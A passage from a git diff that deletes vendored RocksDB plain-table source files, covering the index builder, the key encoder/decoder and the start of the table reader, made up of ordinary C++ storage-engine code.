-//   this case, the offset indicates the offset of sub_index_ holding the
-//   binary search indexes of keys for those rows. Those binary search indexes
-//   are organized in this way:
-//
-// The first 4 bytes, indicate how many indexes (N) are stored after it. After
-// it, there are N 32-bit integers, each points of an offset of the file,
-// which
-// points to starting of a row. Those offsets need to be guaranteed to be in
-// ascending order so the keys they are pointing to are also in ascending
-// order
-// to make sure we can use them to do binary searches. Below is visual
-// presentation of a bucket.
-//
-// <begin>
-//   number_of_records:  varint32
-//   record 1 file offset:  fixedint32
-//   record 2 file offset:  fixedint32
-//    ....
-//   record N file offset:  fixedint32
-// <end>
-class PlainTableIndex {
- public:
-  enum IndexSearchResult {
-    kNoPrefixForBucket = 0,
-    kDirectToFile = 1,
-    kSubindex = 2
-  };
-
-  explicit PlainTableIndex(Slice data) { InitFromRawData(data); }
-
-  PlainTableIndex()
-      : index_size_(0),
-        sub_index_size_(0),
-        num_prefixes_(0),
-        index_(nullptr),
-        sub_index_(nullptr) {}
-
-  IndexSearchResult GetOffset(uint32_t prefix_hash,
-                              uint32_t* bucket_value) const;
-
-  Status InitFromRawData(Slice data);
-
-  const char* GetSubIndexBasePtrAndUpperBound(uint32_t offset,
-                                              uint32_t* upper_bound) const {
-    const char* index_ptr = &sub_index_[offset];
-    return GetVarint32Ptr(index_ptr, index_ptr + 4, upper_bound);
-  }
-
-  uint32_t GetIndexSize() const { return index_size_; }
-
-  uint32_t GetSubIndexSize() const { return sub_index_size_; }
-
-  uint32_t GetNumPrefixes() const { return num_prefixes_; }
-
-  static const uint64_t kMaxFileSize = (1u << 31) - 1;
-  static const uint32_t kSubIndexMask = 0x80000000;
-  static const size_t kOffsetLen = sizeof(uint32_t);
-
- private:
-  uint32_t index_size_;
-  uint32_t sub_index_size_;
-  uint32_t num_prefixes_;
-
-  uint32_t* index_;
-  char* sub_index_;
-};
-
-// PlainTableIndexBuilder is used to create plain table index.
-// After calling Finish(), it returns Slice, which is usually
-// used either to initialize PlainTableIndex or
-// to save index to sst file.
-// For more details about the  index, please refer to:
-// https://github.com/facebook/rocksdb/wiki/PlainTable-Format
-// #wiki-in-memory-index-format
-class PlainTableIndexBuilder {
- public:
-  PlainTableIndexBuilder(Arena* arena, const ImmutableCFOptions& ioptions,
-                         size_t index_sparseness, double hash_table_ratio,
-                         size_t huge_page_tlb_size)
-      : arena_(arena),
-        ioptions_(ioptions),
-        record_list_(kRecordsPerGroup),
-        is_first_record_(true),
-        due_index_(false),
-        num_prefixes_(0),
-        num_keys_per_prefix_(0),
-        prev_key_prefix_hash_(0),
-        index_sparseness_(index_sparseness),
-        prefix_extractor_(ioptions.prefix_extractor),
-        hash_table_ratio_(hash_table_ratio),
-        huge_page_tlb_size_(huge_page_tlb_size) {}
-
-  void AddKeyPrefix(Slice key_prefix_slice, uint32_t key_offset);
-
-  Slice Finish();
-
-  uint32_t GetTotalSize() const {
-    return VarintLength(index_size_) + VarintLength(num_prefixes_) +
-           PlainTableIndex::kOffsetLen * index_size_ + sub_index_size_;
-  }
-
-  static const std::string kPlainTableIndexBlock;
-
- private:
-  struct IndexRecord {
-    uint32_t hash;    // hash of the prefix
-    uint32_t offset;  // offset of a row
-    IndexRecord* next;
-  };
-
-  // Helper class to track all the index records
-  class IndexRecordList {
-   public:
-    explicit IndexRecordList(size_t num_records_per_group)
-        : kNumRecordsPerGroup(num_records_per_group),
-          current_group_(nullptr),
-          num_records_in_current_group_(num_records_per_group) {}
-
-    ~IndexRecordList() {
-      for (size_t i = 0; i < groups_.size(); i++) {
-        delete[] groups_[i];
-      }
-    }
-
-    void AddRecord(uint32_t hash, uint32_t offset);
-
-    size_t GetNumRecords() const {
-      return (groups_.size() - 1) * kNumRecordsPerGroup +
-             num_records_in_current_group_;
-    }
-    IndexRecord* At(size_t index) {
-      return &(groups_[index / kNumRecordsPerGroup]
-                      [index % kNumRecordsPerGroup]);
-    }
-
-   private:
-    IndexRecord* AllocateNewGroup() {
-      IndexRecord* result = new IndexRecord[kNumRecordsPerGroup];
-      groups_.push_back(result);
-      return result;
-    }
-
-    // Each group in `groups_` contains fix-sized records (determined by
-    // kNumRecordsPerGroup). Which can help us minimize the cost if resizing
-    // occurs.
-    const size_t kNumRecordsPerGroup;
-    IndexRecord* current_group_;
-    // List of arrays allocated
-    std::vector<IndexRecord*> groups_;
-    size_t num_records_in_current_group_;
-  };
-
-  void AllocateIndex();
-
-  // Internal helper function to bucket index record list to hash buckets.
-  void BucketizeIndexes(std::vector<IndexRecord*>* hash_to_offsets,
-                        std::vector<uint32_t>* entries_per_bucket);
-
-  // Internal helper class to fill the indexes and bloom filters to internal
-  // data structures.
-  Slice FillIndexes(const std::vector<IndexRecord*>& hash_to_offsets,
-                    const std::vector<uint32_t>& entries_per_bucket);
-
-  Arena* arena_;
-  const ImmutableCFOptions ioptions_;
-  HistogramImpl keys_per_prefix_hist_;
-  IndexRecordList record_list_;
-  bool is_first_record_;
-  bool due_index_;
-  uint32_t num_prefixes_;
-  uint32_t num_keys_per_prefix_;
-
-  uint32_t prev_key_prefix_hash_;
-  size_t index_sparseness_;
-  uint32_t index_size_;
-  uint32_t sub_index_size_;
-
-  const SliceTransform* prefix_extractor_;
-  double hash_table_ratio_;
-  size_t huge_page_tlb_size_;
-
-  std::string prev_key_prefix_;
-
-  static const size_t kRecordsPerGroup = 256;
-};
-
-};  // namespace rocksdb
-
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/table/plain_table_key_coding.cc b/thirdparty/rocksdb/table/plain_table_key_coding.cc
deleted file mode 100644
index 3e87c03..0000000
--- a/thirdparty/rocksdb/table/plain_table_key_coding.cc
+++ /dev/null
@@ -1,498 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef ROCKSDB_LITE
-#include "table/plain_table_key_coding.h"
-
-#include <algorithm>
-#include <string>
-#include "db/dbformat.h"
-#include "table/plain_table_reader.h"
-#include "table/plain_table_factory.h"
-#include "util/file_reader_writer.h"
-
-namespace rocksdb {
-
-enum PlainTableEntryType : unsigned char {
-  kFullKey = 0,
-  kPrefixFromPreviousKey = 1,
-  kKeySuffix = 2,
-};
-
-namespace {
-
-// Control byte:
-// First two bits indicate type of entry
-// Other bytes are inlined sizes. If all bits are 1 (0x03F), overflow bytes
-// are used. key_size-0x3F will be encoded as a variint32 after this bytes.
-
-const unsigned char kSizeInlineLimit = 0x3F;
-
-// Return 0 for error
-size_t EncodeSize(PlainTableEntryType type, uint32_t key_size,
-                  char* out_buffer) {
-  out_buffer[0] = type << 6;
-
-  if (key_size < static_cast<uint32_t>(kSizeInlineLimit)) {
-    // size inlined
-    out_buffer[0] |= static_cast<char>(key_size);
-    return 1;
-  } else {
-    out_buffer[0] |= kSizeInlineLimit;
-    char* ptr = EncodeVarint32(out_buffer + 1, key_size - kSizeInlineLimit);
-    return ptr - out_buffer;
-  }
-}
-}  // namespace
-
-// Fill bytes_read with number of bytes read.
-inline Status PlainTableKeyDecoder::DecodeSize(uint32_t start_offset,
-                                               PlainTableEntryType* entry_type,
-                                               uint32_t* key_size,
-                                               uint32_t* bytes_read) {
-  Slice next_byte_slice;
-  bool success = file_reader_.Read(start_offset, 1, &next_byte_slice);
-  if (!success) {
-    return file_reader_.status();
-  }
-  *entry_type = static_cast<PlainTableEntryType>(
-      (static_cast<unsigned char>(next_byte_slice[0]) & ~kSizeInlineLimit) >>
-      6);
-  char inline_key_size = next_byte_slice[0] & kSizeInlineLimit;
-  if (inline_key_size < kSizeInlineLimit) {
-    *key_size = inline_key_size;
-    *bytes_read = 1;
-    return Status::OK();
-  } else {
-    uint32_t extra_size;
-    uint32_t tmp_bytes_read;
-    success = file_reader_.ReadVarint32(start_offset + 1, &extra_size,
-                                        &tmp_bytes_read);
-    if (!success) {
-      return file_reader_.status();
-    }
-    assert(tmp_bytes_read > 0);
-    *key_size = kSizeInlineLimit + extra_size;
-    *bytes_read = tmp_bytes_read + 1;
-    return Status::OK();
-  }
-}
-
-Status PlainTableKeyEncoder::AppendKey(const Slice& key,
-                                       WritableFileWriter* file,
-                                       uint64_t* offset, char* meta_bytes_buf,
-                                       size_t* meta_bytes_buf_size) {
-  ParsedInternalKey parsed_key;
-  if (!ParseInternalKey(key, &parsed_key)) {
-    return Status::Corruption(Slice());
-  }
-
-  Slice key_to_write = key;  // Portion of internal key to write out.
-
-  uint32_t user_key_size = static_cast<uint32_t>(key.size() - 8);
-  if (encoding_type_ == kPlain) {
-    if (fixed_user_key_len_ == kPlainTableVariableLength) {
-      // Write key length
-      char key_size_buf[5];  // tmp buffer for key size as varint32
-      char* ptr = EncodeVarint32(key_size_buf, user_key_size);
-      assert(ptr <= key_size_buf + sizeof(key_size_buf));
-      auto len = ptr - key_size_buf;
-      Status s = file->Append(Slice(key_size_buf, len));
-      if (!s.ok()) {
-        return s;
-      }
-      *offset += len;
-    }
-  } else {
-    assert(encoding_type_ == kPrefix);
-    char size_bytes[12];
-    size_t size_bytes_pos = 0;
-
-    Slice prefix =
-        prefix_extractor_->Transform(Slice(key.data(), user_key_size));
-    if (key_count_for_prefix_ == 0 || prefix != pre_prefix_.GetUserKey() ||
-        key_count_for_prefix_ % index_sparseness_ == 0) {
-      key_count_for_prefix_ = 1;
-      pre_prefix_.SetUserKey(prefix);
-      size_bytes_pos += EncodeSize(kFullKey, user_key_size, size_bytes);
-      Status s = file->Append(Slice(size_bytes, size_bytes_pos));
-      if (!s.ok()) {
-        return s;
-      }
-      *offset += size_bytes_pos;
-    } else {
-      key_count_for_prefix_++;
-      if (key_count_for_prefix_ == 2) {
-        // For second key within a prefix, need to encode prefix length
-        size_bytes_pos +=
-            EncodeSize(kPrefixFromPreviousKey,
-                       static_cast<uint32_t>(pre_prefix_.GetUserKey().size()),
-                       size_bytes + size_bytes_pos);
-      }
-      uint32_t prefix_len =
-          static_cast<uint32_t>(pre_prefix_.GetUserKey().size());
-      size_bytes_pos += EncodeSize(kKeySuffix, user_key_size - prefix_len,
-                                   size_bytes + size_bytes_pos);
-      Status s = file->Append(Slice(size_bytes, size_bytes_pos));
-      if (!s.ok()) {
-        return s;
-      }
-      *offset += size_bytes_pos;
-      key_to_write = Slice(key.data() + prefix_len, key.size() - prefix_len);
-    }
-  }
-
-  // Encode full key
-  // For value size as varint32 (up to 5 bytes).
-  // If the row is of value type with seqId 0, flush the special flag together
-  // in this buffer to safe one file append call, which takes 1 byte.
-  if (parsed_key.sequence == 0 && parsed_key.type == kTypeValue) {
-    Status s =
-        file->Append(Slice(key_to_write.data(), key_to_write.size() - 8));
-    if (!s.ok()) {
-      return s;
-    }
-    *offset += key_to_write.size() - 8;
-    meta_bytes_buf[*meta_bytes_buf_size] = PlainTableFactory::kValueTypeSeqId0;
-    *meta_bytes_buf_size += 1;
-  } else {
-    file->Append(key_to_write);
-    *offset += key_to_write.size();
-  }
-
-  return Status::OK();
-}
-
-Slice PlainTableFileReader::GetFromBuffer(Buffer* buffer, uint32_t file_offset,
-                                          uint32_t len) {
-  assert(file_offset + len <= file_info_->data_end_offset);
-  return Slice(buffer->buf.get() + (file_offset - buffer->buf_start_offset),
-               len);
-}
-
-bool PlainTableFileReader::ReadNonMmap(uint32_t file_offset, uint32_t len,
-                                       Slice* out) {
-  const uint32_t kPrefetchSize = 256u;
-
-  // Try to read from buffers.
-  for (uint32_t i = 0; i < num_buf_; i++) {
-    Buffer* buffer = buffers_[num_buf_ - 1 - i].get();
-    if (file_offset >= buffer->buf_start_offset &&
-        file_offset + len <= buffer->buf_start_offset + buffer->buf_len) {
-      *out = GetFromBuffer(buffer, file_offset, len);
-      return true;
-    }
-  }
-
-  Buffer* new_buffer;
-  // Data needed is not in any of the buffer. Allocate a new buffer.
-  if (num_buf_ < buffers_.size()) {
-    // Add a new buffer
-    new_buffer = new Buffer();
-    buffers_[num_buf_++].reset(new_buffer);
-  } else {
-    // Now simply replace the last buffer. Can improve the placement policy
-    // if needed.
-    new_buffer = buffers_[num_buf_ - 1].get();
-  }
-
-  assert(file_offset + len <= file_info_->data_end_offset);
-  uint32_t size_to_read = std::min(file_info_->data_end_offset - file_offset,
-                                   std::max(kPrefetchSize, len));
-  if (size_to_read > new_buffer->buf_capacity) {
-    new_buffer->buf.reset(new char[size_to_read]);
-    new_buffer->buf_capacity = size_to_read;
-    new_buffer->buf_len = 0;
-  }
-  Slice read_result;
-  Status s = file_info_->file->Read(file_offset, size_to_read, &read_result,
-                                    new_buffer->buf.get());
-  if (!s.ok()) {
-    status_ = s;
-    return false;
-  }
-  new_buffer->buf_start_offset = file_offset;
-  new_buffer->buf_len = size_to_read;
-  *out = GetFromBuffer(new_buffer, file_offset, len);
-  return true;
-}
-
-inline bool PlainTableFileReader::ReadVarint32(uint32_t offset, uint32_t* out,
-                                               uint32_t* bytes_read) {
-  if (file_info_->is_mmap_mode) {
-    const char* start = file_info_->file_data.data() + offset;
-    const char* limit =
-        file_info_->file_data.data() + file_info_->data_end_offset;
-    const char* key_ptr = GetVarint32Ptr(start, limit, out);
-    assert(key_ptr != nullptr);
-    *bytes_read = static_cast<uint32_t>(key_ptr - start);
-    return true;
-  } else {
-    return ReadVarint32NonMmap(offset, out, bytes_read);
-  }
-}
-
-bool PlainTableFileReader::ReadVarint32NonMmap(uint32_t offset, uint32_t* out,
-                                               uint32_t* bytes_read) {
-  const char* start;
-  const char* limit;
-  const uint32_t kMaxVarInt32Size = 6u;
-  uint32_t bytes_to_read =
-      std::min(file_info_->data_end_offset - offset, kMaxVarInt32Size);
-  Slice bytes;
-  if (!Read(offset, bytes_to_read, &bytes)) {
-    return false;
-  }
-  start = bytes.data();
-  limit = bytes.data() + bytes.size();
-
-  const char* key_ptr = GetVarint32Ptr(start, limit, out);
-  *bytes_read =
-      (key_ptr != nullptr) ? static_cast<uint32_t>(key_ptr - start) : 0;
-  return true;
-}
-
-Status PlainTableKeyDecoder::ReadInternalKey(
-    uint32_t file_offset, uint32_t user_key_size, ParsedInternalKey* parsed_key,
-    uint32_t* bytes_read, bool* internal_key_valid, Slice* internal_key) {
-  Slice tmp_slice;
-  bool success = file_reader_.Read(file_offset, user_key_size + 1, &tmp_slice);
-  if (!success) {
-    return file_reader_.status();
-  }
-  if (tmp_slice[user_key_size] == PlainTableFactory::kValueTypeSeqId0) {
-    // Special encoding for the row with seqID=0
-    parsed_key->user_key = Slice(tmp_slice.data(), user_key_size);
-    parsed_key->sequence = 0;
-    parsed_key->type = kTypeValue;
-    *bytes_read += user_key_size + 1;
-    *internal_key_valid = false;
-  } else {
-    success = file_reader_.Read(file_offset, user_key_size + 8, internal_key);
-    if (!success) {
-      return file_reader_.status();
-    }
-    *internal_key_valid = true;
-    if (!ParseInternalKey(*internal_key, parsed_key)) {
-      return Status::Corruption(
-          Slice("Incorrect value type found when reading the next key"));
-    }
-    *bytes_read += user_key_size + 8;
-  }
-  return Status::OK();
-}
-
-Status PlainTableKeyDecoder::NextPlainEncodingKey(uint32_t start_offset,
-                                                  ParsedInternalKey* parsed_key,
-                                                  Slice* internal_key,
-                                                  uint32_t* bytes_read,
-                                                  bool* seekable) {
-  uint32_t user_key_size = 0;
-  Status s;
-  if (fixed_user_key_len_ != kPlainTableVariableLength) {
-    user_key_size = fixed_user_key_len_;
-  } else {
-    uint32_t tmp_size = 0;
-    uint32_t tmp_read;
-    bool success =
-        file_reader_.ReadVarint32(start_offset, &tmp_size, &tmp_read);
-    if (!success) {
-      return file_reader_.status();
-    }
-    assert(tmp_read > 0);
-    user_key_size = tmp_size;
-    *bytes_read = tmp_read;
-  }
-  // dummy initial value to avoid compiler complain
-  bool decoded_internal_key_valid = true;
-  Slice decoded_internal_key;
-  s = ReadInternalKey(start_offset + *bytes_read, user_key_size, parsed_key,
-                      bytes_read, &decoded_internal_key_valid,
-                      &decoded_internal_key);
-  if (!s.ok()) {
-    return s;
-  }
-  if (!file_reader_.file_info()->is_mmap_mode) {
-    cur_key_.SetInternalKey(*parsed_key);
-    parsed_key->user_key =
-        Slice(cur_key_.GetInternalKey().data(), user_key_size);
-    if (internal_key != nullptr) {
-      *internal_key = cur_key_.GetInternalKey();
-    }
-  } else if (internal_key != nullptr) {
-    if (decoded_internal_key_valid) {
-      *internal_key = decoded_internal_key;
-    } else {
-      // Need to copy out the internal key
-      cur_key_.SetInternalKey(*parsed_key);
-      *internal_key = cur_key_.GetInternalKey();
-    }
-  }
-  return Status::OK();
-}
-
-Status PlainTableKeyDecoder::NextPrefixEncodingKey(
-    uint32_t start_offset, ParsedInternalKey* parsed_key, Slice* internal_key,
-    uint32_t* bytes_read, bool* seekable) {
-  PlainTableEntryType entry_type;
-
-  bool expect_suffix = false;
-  Status s;
-  do {
-    uint32_t size = 0;
-    // dummy initial value to avoid compiler complain
-    bool decoded_internal_key_valid = true;
-    uint32_t my_bytes_read = 0;
-    s = DecodeSize(start_offset + *bytes_read, &entry_type, &size,
-                   &my_bytes_read);
-    if (!s.ok()) {
-      return s;
-    }
-    if (my_bytes_read == 0) {
-      return Status::Corruption("Unexpected EOF when reading size of the key");
-    }
-    *bytes_read += my_bytes_read;
-
-    switch (entry_type) {
-      case kFullKey: {
-        expect_suffix = false;
-        Slice decoded_internal_key;
-        s = ReadInternalKey(start_offset + *bytes_read, size, parsed_key,
-                            bytes_read, &decoded_internal_key_valid,
-                            &decoded_internal_key);
-        if (!s.ok()) {
-          return s;
-        }
-        if (!file_reader_.file_info()->is_mmap_mode ||
-            (internal_key != nullptr && !decoded_internal_key_valid)) {
-          // In non-mmap mode, always need to make a copy of keys returned to
-          // users, because after reading value for the key, the key might
-          // be invalid.
-          cur_key_.SetInternalKey(*parsed_key);
-          saved_user_key_ = cur_key_.GetUserKey();
-          if (!file_reader_.file_info()->is_mmap_mode) {
-            parsed_key->user_key =
-                Slice(cur_key_.GetInternalKey().data(), size);
-          }
-          if (internal_key != nullptr) {
-            *internal_key = cur_key_.GetInternalKey();
-          }
-        } else {
-          if (internal_key != nullptr) {
-            *internal_key = decoded_internal_key;
-          }
-          saved_user_key_ = parsed_key->user_key;
-        }
-        break;
-      }
-      case kPrefixFromPreviousKey: {
-        if (seekable != nullptr) {
-          *seekable = false;
-        }
-        prefix_len_ = size;
-        assert(prefix_extractor_ == nullptr ||
-               prefix_extractor_->Transform(saved_user_key_).size() ==
-                   prefix_len_);
-        // Need read another size flag for suffix
-        expect_suffix = true;
-        break;
-      }
-      case kKeySuffix: {
-        expect_suffix = false;
-        if (seekable != nullptr) {
-          *seekable = false;
-        }
-
-        Slice tmp_slice;
-        s = ReadInternalKey(start_offset + *bytes_read, size, parsed_key,
-                            bytes_read, &decoded_internal_key_valid,
-                            &tmp_slice);
-        if (!s.ok()) {
-          return s;
-        }
-        if (!file_reader_.file_info()->is_mmap_mode) {
-          // In non-mmap mode, we need to make a copy of keys returned to
-          // users, because after reading value for the key, the key might
-          // be invalid.
-          // saved_user_key_ points to cur_key_. We are making a copy of
-          // the prefix part to another string, and construct the current
-          // key from the prefix part and the suffix part back to cur_key_.
-          std::string tmp =
-              Slice(saved_user_key_.data(), prefix_len_).ToString();
-          cur_key_.Reserve(prefix_len_ + size);
-          cur_key_.SetInternalKey(tmp, *parsed_key);
-          parsed_key->user_key =
-              Slice(cur_key_.GetInternalKey().data(), prefix_len_ + size);
-          saved_user_key_ = cur_key_.GetUserKey();
-        } else {
-          cur_key_.Reserve(prefix_len_ + size);
-          cur_key_.SetInternalKey(Slice(saved_user_key_.data(), prefix_len_),
-                                  *parsed_key);
-        }
-        parsed_key->user_key = cur_key_.GetUserKey();
-        if (internal_key != nullptr) {
-          *internal_key = cur_key_.GetInternalKey();
-        }
-        break;
-      }
-      default:
-        return Status::Corruption("Un-identified size flag.");
-    }
-  } while (expect_suffix);  // Another round if suffix is expected.
-  return Status::OK();
-}
-
-Status PlainTableKeyDecoder::NextKey(uint32_t start_offset,
-                                     ParsedInternalKey* parsed_key,
-                                     Slice* internal_key, Slice* value,
-                                     uint32_t* bytes_read, bool* seekable) {
-  assert(value != nullptr);
-  Status s = NextKeyNoValue(start_offset, parsed_key, internal_key, bytes_read,
-                            seekable);
-  if (s.ok()) {
-    assert(bytes_read != nullptr);
-    uint32_t value_size;
-    uint32_t value_size_bytes;
-    bool success = file_reader_.ReadVarint32(start_offset + *bytes_read,
-                                             &value_size, &value_size_bytes);
-    if (!success) {
-      return file_reader_.status();
-    }
-    if (value_size_bytes == 0) {
-      return Status::Corruption(
-          "Unexpected EOF when reading the next value's size.");
-    }
-    *bytes_read += value_size_bytes;
-    success = file_reader_.Read(start_offset + *bytes_read, value_size, value);
-    if (!success) {
-      return file_reader_.status();
-    }
-    *bytes_read += value_size;
-  }
-  return s;
-}
-
-Status PlainTableKeyDecoder::NextKeyNoValue(uint32_t start_offset,
-                                            ParsedInternalKey* parsed_key,
-                                            Slice* internal_key,
-                                            uint32_t* bytes_read,
-                                            bool* seekable) {
-  *bytes_read = 0;
-  if (seekable != nullptr) {
-    *seekable = true;
-  }
-  Status s;
-  if (encoding_type_ == kPlain) {
-    return NextPlainEncodingKey(start_offset, parsed_key, internal_key,
-                                bytes_read, seekable);
-  } else {
-    assert(encoding_type_ == kPrefix);
-    return NextPrefixEncodingKey(start_offset, parsed_key, internal_key,
-                                 bytes_read, seekable);
-  }
-}
-
-}  // namespace rocksdb
-#endif  // ROCKSDB_LIT
diff --git a/thirdparty/rocksdb/table/plain_table_key_coding.h b/thirdparty/rocksdb/table/plain_table_key_coding.h
deleted file mode 100644
index 321e0ae..0000000
--- a/thirdparty/rocksdb/table/plain_table_key_coding.h
+++ /dev/null
@@ -1,183 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-#ifndef ROCKSDB_LITE
-
-#include <array>
-#include "rocksdb/slice.h"
-#include "db/dbformat.h"
-#include "table/plain_table_reader.h"
-
-namespace rocksdb {
-
-class WritableFile;
-struct ParsedInternalKey;
-struct PlainTableReaderFileInfo;
-enum PlainTableEntryType : unsigned char;
-
-// Helper class to write out a key to an output file
-// Actual data format of the key is documented in plain_table_factory.h
-class PlainTableKeyEncoder {
- public:
-  explicit PlainTableKeyEncoder(EncodingType encoding_type,
-                                uint32_t user_key_len,
-                                const SliceTransform* prefix_extractor,
-                                size_t index_sparseness)
-      : encoding_type_((prefix_extractor != nullptr) ? encoding_type : kPlain),
-        fixed_user_key_len_(user_key_len),
-        prefix_extractor_(prefix_extractor),
-        index_sparseness_((index_sparseness > 1) ? index_sparseness : 1),
-        key_count_for_prefix_(0) {}
-  // key: the key to write out, in the format of internal key.
-  // file: the output file to write out
-  // offset: offset in the file. Needs to be updated after appending bytes
-  //         for the key
-  // meta_bytes_buf: buffer for extra meta bytes
-  // meta_bytes_buf_size: offset to append extra meta bytes. Will be updated
-  //                      if meta_bytes_buf is updated.
-  Status AppendKey(const Slice& key, WritableFileWriter* file, uint64_t* offset,
-                   char* meta_bytes_buf, size_t* meta_bytes_buf_size);
-
-  // Return actual encoding type to be picked
-  EncodingType GetEncodingType() { return encoding_type_; }
-
- private:
-  EncodingType encoding_type_;
-  uint32_t fixed_user_key_len_;
-  const SliceTransform* prefix_extractor_;
-  const size_t index_sparseness_;
-  size_t key_count_for_prefix_;
-  IterKey pre_prefix_;
-};
-
-class PlainTableFileReader {
- public:
-  explicit PlainTableFileReader(const PlainTableReaderFileInfo* _file_info)
-      : file_info_(_file_info), num_buf_(0) {}
-  // In mmaped mode, the results point to mmaped area of the file, which
-  // means it is always valid before closing the file.
-  // In non-mmap mode, the results point to an internal buffer. If the caller
-  // makes another read call, the results may not be valid. So callers should
-  // make a copy when needed.
-  // In order to save read calls to files, we keep two internal buffers:
-  // the first read and the most recent read. This is efficient because it
-  // columns these two common use cases:
-  // (1) hash index only identify one location, we read the key to verify
-  //     the location, and read key and value if it is the right location.
-  // (2) after hash index checking, we identify two locations (because of
-  //     hash bucket conflicts), we binary search the two location to see
-  //     which one is what we need and start to read from the location.
-  // These two most common use cases will be covered by the two buffers
-  // so that we don't need to re-read the same location.
-  // Currently we keep a fixed size buffer. If a read doesn't exactly fit
-  // the buffer, we replace the second buffer with the location user reads.
-  //
-  // If return false, status code is stored in status_.
-  bool Read(uint32_t file_offset, uint32_t len, Slice* out) {
-    if (file_info_->is_mmap_mode) {
-      assert(file_offset + len <= file_info_->data_end_offset);
-      *out = Slice(file_info_->file_data.data() + file_offset, len);
-      return true;
-    } else {
-      return ReadNonMmap(file_offset, len, out);
-    }
-  }
-
-  // If return false, status code is stored in status_.
-  bool ReadNonMmap(uint32_t file_offset, uint32_t len, Slice* output);
-
-  // *bytes_read = 0 means eof. false means failure and status is saved
-  // in status_. Not directly returning Status to save copying status
-  // object to map previous performance of mmap mode.
-  inline bool ReadVarint32(uint32_t offset, uint32_t* output,
-                           uint32_t* bytes_read);
-
-  bool ReadVarint32NonMmap(uint32_t offset, uint32_t* output,
-                           uint32_t* bytes_read);
-
-  Status status() const { return status_; }
-
-  const PlainTableReaderFileInfo* file_info() { return file_info_; }
-
- private:
-  const PlainTableReaderFileInfo* file_info_;
-
-  struct Buffer {
-    Buffer() : buf_start_offset(0), buf_len(0), buf_capacity(0) {}
-    std::unique_ptr<char[]> buf;
-    uint32_t buf_start_offset;
-    uint32_t buf_len;
-    uint32_t buf_capacity;
-  };
-
-  // Keep buffers for two recent reads.
-  std::array<unique_ptr<Buffer>, 2> buffers_;
-  uint32_t num_buf_;
-  Status status_;
-
-  Slice GetFromBuffer(Buffer* buf, uint32_t file_offset, uint32_t len);
-};
-
-// A helper class to decode keys from input buffer
-// Actual data format of the key is documented in plain_table_factory.h
-class PlainTableKeyDecoder {
- public:
-  explicit PlainTableKeyDecoder(const PlainTableReaderFileInfo* file_info,
-                                EncodingType encoding_type,
-                                uint32_t user_key_len,
-                                const SliceTransform* prefix_extractor)
-      : file_reader_(file_info),
-        encoding_type_(encoding_type),
-        prefix_len_(0),
-        fixed_user_key_len_(user_key_len),
-        prefix_extractor_(prefix_extractor),
-        in_prefix_(false) {}
-  // Find the next key.
-  // start: char array where the key starts.
-  // limit: boundary of the char array
-  // parsed_key: the output of the result key
-  // internal_key: if not null, fill with the output of the result key in
-  //               un-parsed format
-  // bytes_read: how many bytes read from start. Output
-  // seekable: whether key can be read from this place. Used when building
-  //           indexes. Output.
-  Status NextKey(uint32_t start_offset, ParsedInternalKey* parsed_key,
-                 Slice* internal_key, Slice* value, uint32_t* bytes_read,
-                 bool* seekable = nullptr);
-
-  Status NextKeyNoValue(uint32_t start_offset, ParsedInternalKey* parsed_key,
-                        Slice* internal_key, uint32_t* bytes_read,
-                        bool* seekable = nullptr);
-
-  PlainTableFileReader file_reader_;
-  EncodingType encoding_type_;
-  uint32_t prefix_len_;
-  uint32_t fixed_user_key_len_;
-  Slice saved_user_key_;
-  IterKey cur_key_;
-  const SliceTransform* prefix_extractor_;
-  bool in_prefix_;
-
- private:
-  Status NextPlainEncodingKey(uint32_t start_offset,
-                              ParsedInternalKey* parsed_key,
-                              Slice* internal_key, uint32_t* bytes_read,
-                              bool* seekable = nullptr);
-  Status NextPrefixEncodingKey(uint32_t start_offset,
-                               ParsedInternalKey* parsed_key,
-                               Slice* internal_key, uint32_t* bytes_read,
-                               bool* seekable = nullptr);
-  Status ReadInternalKey(uint32_t file_offset, uint32_t user_key_size,
-                         ParsedInternalKey* parsed_key, uint32_t* bytes_read,
-                         bool* internal_key_valid, Slice* internal_key);
-  inline Status DecodeSize(uint32_t start_offset,
-                           PlainTableEntryType* entry_type, uint32_t* key_size,
-                           uint32_t* bytes_read);
-};
-
-}  // namespace rocksdb
-
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/table/plain_table_reader.cc b/thirdparty/rocksdb/table/plain_table_reader.cc
deleted file mode 100644
index d4d9edb..0000000
--- a/thirdparty/rocksdb/table/plain_table_reader.cc
+++ /dev/null
@@ -1,747 +0,0 @@
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#ifndef ROCKSDB_LITE
-
-#include "table/plain_table_reader.h"
-
-#include <string>
-#include <vector>
-
-#include "db/dbformat.h"
-
-#include "rocksdb/cache.h"
-#include "rocksdb/comparator.h"
-#include "rocksdb/env.h"
-#include "rocksdb/filter_policy.h"
-#include "rocksdb/options.h"
-#include "rocksdb/statistics.h"
-
-#include "table/block.h"
-#include "table/bloom_block.h"
-#include "table/filter_block.h"
-#include "table/format.h"
-#include "table/internal_iterator.h"
-#include "table/meta_blocks.h"
-#include "table/two_level_iterator.h"
-#include "table/plain_table_factory.h"
-#include "table/plain_table_key_coding.h"
-#include "table/get_context.h"
-
-#include "monitoring/histogram.h"
-#include "monitoring/perf_context_imp.h"
-#include "util/arena.h"
-#include "util/coding.h"
-#include "util/dynamic_bloom.h"
-#include "util/hash.h"
-#include "util/murmurhash.h"
-#include "util/stop_watch.h"
-#include "util/string_util.h"
-
-namespace rocksdb {
-
-namespace {
-
-// Safely getting a uint32_t element from a char array, where, starting from
-// `base`, every 4 bytes are considered as an fixed 32 bit integer.
-inline uint32_t GetFixed32Element(const char* base, size_t offset) {
-  return DecodeFixed32(base + offset * sizeof(uint32_t));
-}
-}  // namespace
-
-// Iterator to iterate IndexedTable
-class PlainTableIterator : public InternalIterator {
- public:
-  explicit PlainTableIterator(PlainTableReader* table, bool use_prefix_seek);
